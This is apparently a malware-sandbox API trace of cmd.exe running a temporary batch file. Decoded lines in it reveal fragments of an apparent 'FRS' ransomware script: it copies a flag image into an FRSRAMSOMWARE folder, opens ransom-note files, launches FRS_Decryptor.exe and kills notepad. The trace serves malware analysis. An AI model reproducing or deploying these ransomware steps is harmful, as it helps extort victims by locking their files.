dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0112.348] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.348] GetFileType (hFile=0x2b8) returned 0x1 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0112.348] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0112.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0112.348] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.348] GetFileType (hFile=0x2b8) returned 0x1 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0112.348] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0112.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0112.348] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.348] GetFileType (hFile=0x2b8) returned 0x1 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0112.348] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0112.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0112.348] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.348] GetFileType (hFile=0x2b8) returned 0x1 [0112.348] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0112.348] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0112.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0112.349] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.349] GetFileType (hFile=0x2b8) returned 0x1 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0112.349] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0112.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0112.349] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.349] GetFileType (hFile=0x2b8) returned 0x1 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0112.349] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0112.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0112.349] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.349] GetFileType (hFile=0x2b8) returned 0x1 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0112.349] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0112.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0112.349] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.349] GetFileType (hFile=0x2b8) returned 0x1 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0112.349] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0112.349] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0112.349] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0112.350] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0112.350] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.350] GetFileType (hFile=0x2b8) returned 0x1 [0112.350] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0112.350] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0112.350] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0112.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0112.350] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0112.350] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.350] GetFileType (hFile=0x2b8) returned 0x1 [0112.350] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0112.350] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0112.350] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0112.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0112.350] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0112.350] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.350] GetFileType (hFile=0x2b8) returned 0x1 [0112.350] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0112.350] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0112.350] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0112.350] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0112.350] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0112.350] _get_osfhandle (_FileHandle=1) returned 0x28 [0112.350] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0112.351] _get_osfhandle (_FileHandle=0) returned 0x24 [0112.351] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0112.351] SetConsoleInputExeNameW () returned 0x1 [0112.351] GetConsoleOutputCP () returned 0x1b5 [0112.351] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0112.351] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.351] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0112.351] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0112.351] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.351] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0112.351] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0112.351] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0112.351] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0112.351] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0112.351] GetFileType (hFile=0x2b8) returned 0x1 [0112.351] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.351] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0112.351] _tell (_FileHandle=3) returned 2512 [0112.352] _close (_FileHandle=3) returned 0 [0112.352] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0112.352] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0112.352] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0112.352] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0112.352] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0112.352] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0112.352] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0112.352] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0112.352] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0112.352] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0112.352] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0112.352] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0112.352] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0112.352] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0112.352] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0112.352] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0112.352] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0112.352] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0112.352] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0112.352] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0112.352] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0112.352] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0112.352] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0112.352] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0112.352] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0112.352] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0112.352] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0112.352] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0112.352] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0112.352] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0112.352] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0112.352] _wcsicmp (_String1="ping", _String2="START") returned -3 [0112.352] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0112.352] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0112.352] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0112.352] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0112.352] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0112.352] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0112.352] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0112.352] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0112.352] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0112.352] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0112.352] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0112.352] SetErrorMode (uMode=0x0) returned 0x0 [0112.352] SetErrorMode (uMode=0x1) returned 0x0 [0112.353] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0112.353] SetErrorMode (uMode=0x0) returned 0x1 [0112.353] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0112.353] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0112.353] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0112.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.353] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0112.353] GetLastError () returned 0x2 [0112.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a0b0 [0112.353] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0112.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0112.353] GetLastError () returned 0x2 [0112.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59bb0 [0112.353] FindClose (in: hFindFile=0xd59bb0 | out: hFindFile=0xd59bb0) returned 1 [0112.353] GetFileType (hFile=0x28) returned 0x2 [0112.353] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0112.353] _dup (_FileHandle=1) returned 3 [0112.354] _close (_FileHandle=1) returned 0 [0112.354] _wcsicmp (_String1="nul", _String2="con") returned 11 [0112.354] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0112.354] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0112.354] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0112.354] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0112.354] SetErrorMode (uMode=0x0) returned 0x0 [0112.354] SetErrorMode (uMode=0x1) returned 0x0 [0112.354] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61468, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0112.354] SetErrorMode (uMode=0x0) returned 0x1 [0112.354] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0112.354] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0112.354] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0112.354] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.354] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0112.354] GetLastError () returned 0x2 [0112.354] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.354] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0112.354] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0112.355] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0112.355] GetLastError () returned 0x2 [0112.355] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0112.355] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0112.355] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0112.355] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0112.355] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0112.355] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0112.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0112.355] _wcsnicmp 